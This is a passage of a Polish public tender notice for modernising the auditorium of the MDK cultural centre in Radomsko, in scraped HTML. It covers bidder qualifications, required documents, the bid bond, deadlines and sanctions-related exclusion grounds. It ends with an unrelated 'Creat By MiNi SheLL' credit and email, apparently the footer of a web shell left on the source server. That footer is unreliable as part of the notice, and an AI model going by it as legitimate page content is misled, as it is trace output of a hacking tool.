kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. 6.3. W przypadku, o którym mowa w pkt 6.2., wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi<br/>załącznik nr 3 do IDW.<br/>Uwaga:<br/>Przez ww. uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których<br/>mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 2021 r, poz. 2351 ze zm.) lub<br/>odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio<br/>obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju,<br/>w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ,<br/>zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2021 r. poz. 1646).<br/>W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym Handlu<br/>(EFTA) – stron umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a ustawy z<br/>dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa<br/>(t.j. Dz.U. z 2019 r., poz. 1117)), osoby wyznaczone do realizacji zamówienia posiadają<br/>uprawnienia budowlane do kierowania robotami budowlanymi, wyszczególnione wyżej jeżeli:<br/>• nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej<br/>wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium<br/>Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień budowlanych do kierowania<br/>robotami budowlanymi, oraz<br/>• posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku<br/>decyzji o uznaniu kwalifikacji zawodowych zostały spełnione w stosunku do tych osób<br/>wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000r. o samorządach<br/>zawodowych architektów, inżynierów budownictwa, dotyczące świadczenia usług<br/>transgranicznych.<br/>Zamawiający na etapie składania i oceny ofert nie wymaga, aby te osoby poza legitymowaniem<br/>się posiadaniem uprawnień budowlanych zdobytych poza terytorium Polski, musiały<br/>dysponować odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub w przypadku braku<br/>decyzji o uznaniu kwalifikacji zawodowych, by spełniły wymagania, o których mowa w art. 20a<br/>ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa, dotyczące świadczenia usług transgranicznych, tj. aby uzyskały one<br/>tymczasowy wpis na listę członków właściwej izby samorządu zawodowego.<br/>Na podstawie art. 104 ustawy Prawo budowlane osoby, które, przed dniem wejścia w życie<br/>ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania<br/>zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują<br/>uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/>Zakres uprawnień budowlanych będzie odczytany zgodnie z treścią decyzji o ich nadaniu i w<br/>oparciu o przepisy będące podstawą ich nadania. W celu uniknięcia wątpliwości zaleca się<br/>podanie przez wykonawcę daty wydania uprawnień i dokładne cytowanie zakresu uprawnień z<br/>posiadanego zaświadczenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w postępowaniu<br/>a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>b)	wykaz dostaw wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy;<br/>c)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>d)	informacja banku lub spółdzielczej kasy oszczędnościowo – kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia - nie wymagane.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1) aktualne na dzień składania ofert odpowiednio oświadczenie lub oświadczenia, o których<br/>mowa w pkt 7.1,7.3 i 7.6.3) IDW ,<br/>2) zobowiązanie podmiotu do udostępnienia zasobów, jeżeli wykonawca polega na zasobach<br/>innego podmiotu,<br/>3) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby, jeżeli wykonawca polega na zasobach innego<br/>podmiotu,<br/>4) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (jeżeli<br/>dotyczy);<br/>5) dowody równoważności, o których mowa w pkt 3 IDW, jeżeli wykonawca zaoferował<br/>rozwiązania równoważne w stosunku do określonych w opisie przedmiotu zamówienia;<br/>6) uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, jeżeli wykonawca zastrzegł w ofercie<br/>informacje jako tajemnicę przedsiębiorstwa;<br/>7) dokumenty potwierdzające wniesienie wadium określone pkt 10 IDW; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 10. Wymagania dotyczące wadium<br/>10.1. Zamawiający określa kwotę wadium w wysokości 25.000,00 złotych (słownie: dwadzieścia<br/>pięć tysięcy złotych 00/100).<br/>10.2. Wadium wykonawca wnosi się przed upływem terminu składania ofert i utrzymuje<br/>nieprzerwanie do dnia upływu terminu związania ofert. 10.3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z<br/>2020 r. poz. 299).<br/>10.4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy<br/>Zamawiającego w ESBANK Banku Spółdzielczym w Radomsku.<br/>Nr rachunku: 75 8980 0009 2105 0060 2291 0020<br/>z dopiskiem: Wadium – „Modernizacja Sali widowiskowej MDK w Radomsku”<br/>10.5. Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki<br/>pieniężne zostaną uznane na koncie Zamawiającego przed upływem terminu składnia ofert.<br/>Pozostałe informacje dot. wadium opisane zostały w Rozdziale I pkt. 10 Specyfikacji Warunków<br/>Zamówienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie.<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące<br/>wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>2) W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, o którym mowa w art.<br/>125 ust. 1 Pzp w zakresie wskazanym przez Zamawiającego w Rozdziale II SWZ składa każdy z<br/>wykonawców. Oświadczenia te dołączone do oferty potwierdzają brak podstaw wykluczenia<br/>oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>4) W przypadku określenia przez Zamawiającego warunku dotyczącego zdolności do<br/>występowania w obrocie gospodarczym lub zdolności technicznej lub zawodowej wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>Formularz oświadczenia stanowi załącznik nr 3 do IDW.<br/>5) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały szczegółowo opisane w<br/>Rozdziale IV Specyfikacji Warunków Zamówienia - projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-18 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Podstawy wykluczenia z postępowania o udzielenie zamówienia publicznego na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022 r. poz. 835), zwanej dalej &#34;ustawą o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę &#34;:<br/><br/>Z postępowania o udzielenie zamówienia publicznego wyklucza się:<br/><br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę ;<br/><br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę ;<br/>3) wykonawcę , którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę .

Creat By MiNi SheLL
Email: jattceo@gmail.com